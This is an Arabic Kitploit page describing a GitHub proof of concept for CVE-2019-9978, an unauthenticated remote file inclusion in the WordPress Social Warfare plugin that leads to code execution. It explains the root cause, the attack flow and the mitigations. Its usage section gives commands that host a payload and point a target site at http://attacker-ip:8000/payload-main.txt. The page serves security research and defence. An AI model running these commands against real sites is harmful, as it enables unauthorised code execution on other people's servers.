Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-9978-RCE-PoC — نموذج إثبات مفهوم مخصص بلغة بايثون يعرض تحليل السبب الجذري واستغلال الثغرة CVE 2019-9978 (إضافة Social Warfare)، مع التركيز على سيناريو الهجوم العملي من تضمين الملفات عن بُعد (RFI) إلى تنفيذ الأكواد عن بُعد (RCE). | Kitploit
أدوات/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

نموذج إثبات مفهوم مخصص بلغة بايثون يعرض تحليل السبب الجذري واستغلال الثغرة CVE 2019-9978 (إضافة Social Warfare)، مع التركيز على سيناريو الهجوم العملي من تضمين الملفات عن بُعد (RFI) إلى تنفيذ الأكواد عن بُعد (RCE).

عرض المستودع
21منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-9978 RCE PoC – استغلال إضافة Social Warfare لووردبريس

تضمين ملفات عن بُعد غير مصادق (RFI) إلى تنفيذ أكواد عن بُعد (RCE)


📌 الوصف

يحتوي هذا المستودع على إثبات مفهوم (PoC) مبني على بايثون يوضح استغلال CVE-2019-9978، وهي ثغرة حرجة في إضافة Social Warfare الخاصة بووردبريس.

تسمح الثغرة لـمهاجم غير مصادق بتنفيذ تضمين ملفات عن بُعد (RFI)، والتي يمكن ترقيتها إلى تنفيذ أكواد عن بُعد (RCE)* عن طريق استضافة حمولة ضارة على خادم يتحكم فيه المهاجم.

تم تطوير واختبار إثبات المفهوم هذا في بيئة مختبرية لووردبريس خاضعة للسيطرة لأغراض تعليمية واختبارات أمنية مصرح بها فقط.


🔍 ملخص الثغرة

  • معرّف CVE: CVE-2019-9978
  • المكوّن المتأثر: Social Warfare (إضافة ووردبريس)
  • الإصدارات المتأثرة: ≤ 3.5.2
  • نوع الثغرة: تضمين ملفات عن بُعد (RFI)
  • الأثر: تنفيذ أكواد عن بُعد (RCE)
  • المصادقة المطلوبة: لا
  • متجه الهجوم: عن بُعد
  • الخطورة: حرجة

🧠 تحليل السبب الجذري

يفشل إضافة Social Warfare في التحقق بشكل صحيح من المدخلات المقدمة من المستخدم وتنقيتها، وهي المدخلات المستخدمة لتضمين المحتوى عن بُعد.
نتيجة لذلك، يمكن للمهاجم توفير URL خارجي خبيث، مما يؤدي إلى تضمين ملفات عن بُعد غير مصادق.

عندما يحتوي الملف البعيد المُضمّن على كود PHP قابل للتنفيذ، يتم تنفيذه في سياق خادم ووردبريس، مما يؤدي إلى تنفيذ أكواد عن بُعد.


🔄 تدفق الهجوم


Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)


🧪 إثبات المفهوم (PoC)

  1. يستضيف المهاجم حمولة ضارة على خادم HTTP خارجي
  2. يستدعي نقطة نهاية Social Warfare الضعيفة الملف البعيد
  3. يتم تنفيذ الحمولة على خادم ووردبريس المستهدف
  4. يحصل المهاجم على تنفيذ أوامر عن بُعد
  5. يقوم سكربت الاستغلال بأتمتة هذه العملية لأغراض الاختبار والبحث

▶️ الاستخدام

الخطوة 1: استضافة الحمولة

python3 -m http.server 8000

ضع ملف الحمولة الخاص بك (مثل payload-main.txt) في دليل الخادم.


الخطوة 2: تنفيذ الاستغلال

python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt

🛠 المتطلبات

  • بايثون 3.x
  • إصدار ضعيف من إضافة Social Warfare الخاصة بووردبريس
  • بيئة ووردبريس للاختبار
  • خادم HTTP محلي أو بعيد لاستضافة الحمولة

🛡 التخفيف والدفاع

  • تحديث إضافة Social Warfare إلى إصدار مصحح

  • تعطيل تضمين الملفات عن بُعد:

    allow_url_include = Off
    
  • تقييد معالجة الروابط الخارجية في إضافات ووردبريس

  • نشر جدار حماية لتطبيقات الويب (WAF) مع قواعد كشف RFI


⚠️ إخلاء مسؤولية قانوني

هذا المشروع مخصص بشكل صارم للأغراض التعليمية واختبارات الأمن المصرح بها فقط.

لا تستخدم إثبات المفهوم هذا ضد الأنظمة دون إذن صريح. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


🔗 المراجع والاعتمادات

  • الباحث الأصلي: Luka Sikic
  • مرجع إثبات المفهوم الأصلي: https://github.com/hash3liZer/CVE-2019-9978
  • المؤلف / التعديل: Vaidehi Muluru

تنزيل الأداة